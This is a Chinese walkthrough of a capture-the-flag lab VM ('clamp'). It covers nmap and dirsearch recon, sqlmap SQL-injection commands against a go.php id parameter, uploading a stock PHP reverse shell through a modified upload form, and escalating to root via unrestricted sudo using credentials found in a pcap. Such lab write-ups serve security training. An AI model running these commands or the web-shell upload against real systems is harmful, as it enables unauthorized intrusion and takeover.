clamp靶机复现

靶机设置

设置靶机为NAT模式

靶机IP发现

nmap 192.168.112.0/24

靶机IP为192.168.112.143

目录扫描

dirsearch 192.168.112.143

访问浏览器

提示让我们扫描更多的目录

换个更大的字典,扫出来一个 /nt4stopc/ 目录

目录拼接

拼接 /nt4stopc/

发现页面中有很多判断题

对为1,错为0

按顺序判断下来为 0110111001

拼接访问页面

SQL注入

点击网页发现存在id参数

尝试测试sql注入

python sqlmap.py -u http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/go.php?id=1 --batch

果然发现存在sql注入

python sqlmap.py -u http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/go.php?id=1 --dbs --batch

查看当前数据库

查看tatil表

python sqlmap.py -u http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/go.php?id=1 -D tatil --tables --batch

字段内容为 hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf folder upload.php

进行解码 uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas

再次拼接

再次拼接

拼接upload.php

发现文件上传点,但是没有提交按钮,自己添加一个

添加成功

getshell

kali生成反弹shell

locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php .

开启监听

上传文件

http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/2ad6bded962b884337eaeb921d7c2764.php

md5加密后访问文件

提权

生成交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

在 /var/www/html 下看见important.pcapng文件,查看他

发现有一个email信息

url解码后得到

email=mkelepce&message=Hello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it. Good work

账号: mkelepce

密码:mklpc-osas112.

登陆成功

sudo -l查看免密操作

发现可以进行任何操作

直接sudo su

提权成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值